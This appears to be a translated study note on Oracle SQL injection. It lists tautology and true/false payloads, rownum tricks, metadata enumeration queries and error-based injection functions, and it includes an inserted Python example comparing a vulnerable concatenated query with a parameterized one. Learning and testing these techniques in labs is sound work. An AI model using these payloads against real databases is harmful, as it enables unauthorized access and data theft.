
ORACLE INJECTION


' or 1=1 --

' and 1=1 --    : output shown

> SELECT * FROM tb_board WHERE title like '%' and 1=1 -- %'

' and 1=2 --    : no output
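
The true/false pair above, run against the same tb_board query built two ways, as an added example that is not part of the original post. Python's built-in sqlite3 stands in for Oracle so the code runs offline; the sample rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample rows; tb_board and title come from the page's query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tb_board (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO tb_board (title) VALUES (?)",
                   [("notice",), ("oracle setup",), ("weekly report",)])
    return db

def search_concat(db, keyword):
    # Vulnerable form: the keyword is pasted into the SQL text, so a quote
    # in it closes the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM tb_board WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in db.execute(sql)]

def search_bound(db, keyword):
    # Hardened form: the keyword travels as a bind value and is only ever
    # compared as data. LIKE wildcards inside it are escaped as well.
    # (Oracle drivers use the same idea with placeholders such as :kw.)
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = "SELECT title FROM tb_board WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escaped + "%",))]

def differs_on_boolean_pair(search, db):
    # The page's diagnostic: an always-true and an always-false condition
    # change the output only when the input is evaluated as SQL.
    return search(db, "' and 1=1 --") != search(db, "' and 1=2 --")

if __name__ == "__main__":
    db = make_db()
    print("concatenated query reacts to the pair:",
          differs_on_boolean_pair(search_concat, db))
    print("bound query reacts to the pair       :",
          differs_on_boolean_pair(search_bound, db))
```

With the bind value both inputs are searched for as literal text, so the two results are identical, which is the "not a conditional" outcome described in step 1.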

1. Check whether an error occurs / diagnose the vulnerability / complete the attack condition

' or 1=1 --

' or 1=2 --

>> If the results are identical, the input is not being treated as a conditional expression

' or 1=1 and 1=1 --

' or 1=2 and 1=2 -- 

 

2. Environment analysis

3. Attack selection

4. Metadata lookup

5. 

 

 

rownum pseudocolumn

# mysql : #,-- (comments)
# oracle: --(comment)
SELECT username FROM all_users; > usernames are output normally
SELECT rownum,username FROM all_users >> row numbers and usernames are output normally
SELECT rownum, username FROM all_users WHERE rownum=1; >> the name of user no. 1 is output normally

 

Caution when using rownum > rownum's default value is set to 1.

SELECT username FROM all_users WHERE rownum=1; > user no. 1 is output normally
SELECT username FROM all_users WHERE rownum=2; > user no. 2 cannot be output

Because rownum's default value is 1, the query is equivalent to the statement below

SELECT username FROM all_users WHERE 1=2; >> which is why nothing is output

 

SELECT username FROM all_users WHERE rownum!=3;
SELECT username FROM all_users WHERE rownum<3;

> These produce output, but only up to row no. 2

SELECT rownum r , username FROM all_users WHERE r=3;

# rownum is given the alias r

Error: the WHERE clause is evaluated before the SELECT clause runs, so the alias r does not exist yet

SELECT * FROM (SELECT rownum r,username FROM all_users) WHERE r=3;

Only row no. 3 is output, as intended

ORACLE metadata lookup
                 MYSQL                         ORACLE
Database name    information_schema.schemata   User
Table name       information_schema.tables     User_tables
Column name      information_schema.columns    User_tab_columns

 

ORACLE: three categories of data
DBA_    Database administrator
ALL_    Information on all tables and columns that the currently logged-in user can access
USER_   Information on the tables and columns that the currently logged-in user created/owns

SELECT DISTINCT owner FROM all_tables;	# shows the owners of all tables with duplicates removed

SELECT DISTINCT owner FROM all_tab_columns;		# shows the owners of all columns with duplicates removed
SELECT DISTINCT * FROM all_tables WHERE owner='C##KITRI';
# lists the tables owned by the user 'C##KITRI'
# the user name after owner must always be in uppercase
# Query the column names of the MEMBERS table owned by the user C##KITRI
SELECT column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS';

Metadata enumeration

1. Find the current user.

2. View the list of all tables that the current user has the privileges to query

ex) SELECT table_name FROM ALL_TABLES WHERE owner='C##KITRI'

3. View the list of all columns that the current user has the privileges to query.

ex) SELECT column_name FROM ALL_TAB_COLUMNS WHERE owner='C##KITRI' AND table_name='MEMBERS'

ORACLE
ALL
ALL_tables
ALL_tab_columns

 

Error-based attacks in ORACLE

ORDSYS.ORD_DICOM.GETMAPPINGXPATH (attack statement)

CTXSYS.DRITHSX.SN(1,attack statement)

CTXSYS.CTX_QUERY.CHK_XPATH(attack statement,1)

 

# Three basic pieces of information
SELECT banner FROM v$version WHERE rownum=1;	# version
SELECT user FROM dual;		# user
SELECT global_name FROM global_name;		# SID

Metadata enumeration

Order of sequential access

1. Look up the user name

2. Look up the tables

3. Look up the columns

 

1. An accessible user name (owner) is required

SELECT DISTINCT owner FROM all_tables;


User enumeration

# Execution error // reason: rownum and DISTINCT cannot be used together.
SELECT owner FROM (SELECT rownum r, DISTINCT owner FROM all_tables) WHERE r=1;

# Solution: remove the duplicates first, then number the rows with rownum.
SELECT owner FROM (SELECT rownum r, owner FROM(SELECT DISTINCT owner FROM all_tables)) WHERE r=1;

1. SYS   2. XDB   3. SYSTEM   4. CTXSYS   5. MDSYS   6. C##KITRI


TABLE enumeration in ORACLE
# numbers the table_name values in all_tables whose owner is C##KITRI
SELECT table_name FROM (SELECT rownum r, table_name FROM all_tables WHERE owner='C##KITRI') WHERE r=1;

# enumerating the column names
SELECT column_name FROM ( SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS') WHERE r=1;
